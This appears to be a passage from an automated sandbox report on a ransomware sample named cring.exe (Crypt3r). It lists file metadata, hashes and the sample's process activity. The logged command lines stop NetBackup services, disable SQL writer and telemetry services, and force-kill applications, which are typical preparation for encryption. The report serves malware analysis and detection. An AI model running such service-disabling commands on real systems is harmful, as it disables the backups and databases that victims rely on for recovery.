.reloc0x80000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountry
RT_VERSION0x60900x304data
RT_MANIFEST0x63a40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLLImport
mscoree.dll_CorExeMain

Version Infos

DescriptionData
Translation0x0000 0x04b0
LegalCopyrightCopyright 2020
Assembly Version1.0.0.0
InternalNamecring.exe
FileVersion1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductNameCrypt3r
ProductVersion1.0.0.0
FileDescriptionCrypt3r
OriginalFilenamecring.exe

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Start time:04:54:13
Start date:22/12/2020
Path:C:\Users\user\Desktop\cring.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\cring.exe'
Imagebase:0xa40000
File size:17408 bytes
MD5 hash:C5D712F82D5D37BB284ACD4468AB3533
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:low

General

Start time:04:54:13
Start date:22/12/2020
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff61de10000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:04:54:15
Start date:22/12/2020
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\kill.bat' 'C:\Users\user\Desktop\cring.exe''
Imagebase:0x7ff7180e0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:04:54:15
Start date:22/12/2020
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff61de10000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:04:54:15
Start date:22/12/2020
Path:C:\Windows\System32\net.exe
Wow64 process (32bit):false
Commandline:net stop BMR Boot Service /y
Imagebase:0x7ff7a67c0000
File size:56832 bytes
MD5 hash:15534275EDAABC58159DD0F8607A71E5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:04:54:16
Start date:22/12/2020
Path:C:\Windows\System32\net1.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\net1 stop BMR Boot Service /y
Imagebase:0x7ff7b45f0000
File size:175104 bytes
MD5 hash:AF569DE92AB6C1B9C681AF1E799F9983
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:04:54:16
Start date:22/12/2020
Path:C:\Windows\System32\net.exe
Wow64 process (32bit):false
Commandline:net stop NetBackup BMR MTFTP Service /y
Imagebase:0x7ff7a67c0000
File size:56832 bytes
MD5 hash:15534275EDAABC58159DD0F8607A71E5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:04:54:17
Start date:22/12/2020
Path:C:\Windows\System32\net1.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
Imagebase:0x7ff7b45f0000
File size:175104 bytes
MD5 hash:AF569DE92AB6C1B9C681AF1E799F9983
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:04:54:17
Start date:22/12/2020
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc config SQLTELEMETRY start= disabled
Imagebase:0x7ff64c7e0000
File size:69120 bytes
MD5 hash:D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:04:54:18
Start date:22/12/2020
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc config SQLTELEMETRY$ECWDB2 start= disabled
Imagebase:0x7ff64c7e0000
File size:69120 bytes
MD5 hash:D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:04:54:18
Start date:22/12/2020
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc config SQLWriter start= disabled
Imagebase:0x7ff64c7e0000
File size:69120 bytes
MD5 hash:D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:04:54:19
Start date:22/12/2020
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc config SstpSvc start= disabled
Imagebase:0x7ff64c7e0000
File size:69120 bytes
MD5 hash:D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:04:54:19
Start date:22/12/2020
Path:C:\Windows\System32\taskkill.exe
Wow64 process (32bit):false
Commandline:taskkill /IM mspub.exe /F
Imagebase:0x7ff7460d0000
File size:94720 bytes
MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:04:54:20
Start date:22/12/2020
Path:C:\Windows\System32\taskkill.exe
Wow64 process (32bit):false
Commandline:taskkill /IM mydesktopqos.exe /F
Imagebase:0x7ff7460d0000
File size:94720 bytes
MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:04:54:20
Start date:22/12/2020
Path:C:\Windows\System32\taskkill.exe
Wow64 process (32bit):false
Commandline:taskkill /IM mydesktopservice.exe /F
Imagebase:0x7ff7460d0000
File size:94720 bytes
MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Disassembly

Code Analysis

Reset < >

    Executed Functions

    Memory Dump Source
    • Source File: 00000000.00000002.325444463.00007FFD0A8A0000.00000040.00000001.sdmp, Offset: 00007FFD0A8A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ffd0a8a0000_cring.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: e08e18ebcf5ada910bc250d261d503b7675875b7c12e330015550d6d1c818a7b
    • Instruction ID: fae9d4dfd2eee6cfd2c8a2cbcc96feda1158fa69e6e64367793b3cb98c017890
    • Opcode Fuzzy Hash: e08e18ebcf5ada910bc250d261d503b7675875b7c12e330015550d6d1c818a7b
    • Instruction Fuzzy Hash: 0C316B2164D6818FE356A738D8639E13BE0EF51310B0942F6D088C7593C92D6847C391
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000000.00000002.325444463.00007FFD0A8A0000.00000040.00000001.sdmp, Offset: 00007FFD0A8A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ffd0a8a0000_cring.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 458d1009c28f55f88257986f7099d966057fbdeee44e090ff61518fd332d6f71
    • Instruction ID: 9c31fb629e32de5301a78af242ed14e668c4f73e80076dda5a5f6dcf8c91cb1e
    • Opcode Fuzzy Hash: 458d1009c28f55f88257986f7099d966057fbdeee44e090ff61518fd332d6f71
    • Instruction Fuzzy Hash: 2C31D232E48A4C8FDB48EF58D4506EAB7B0FF99310F0506BBD51CD3292DA35A855CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions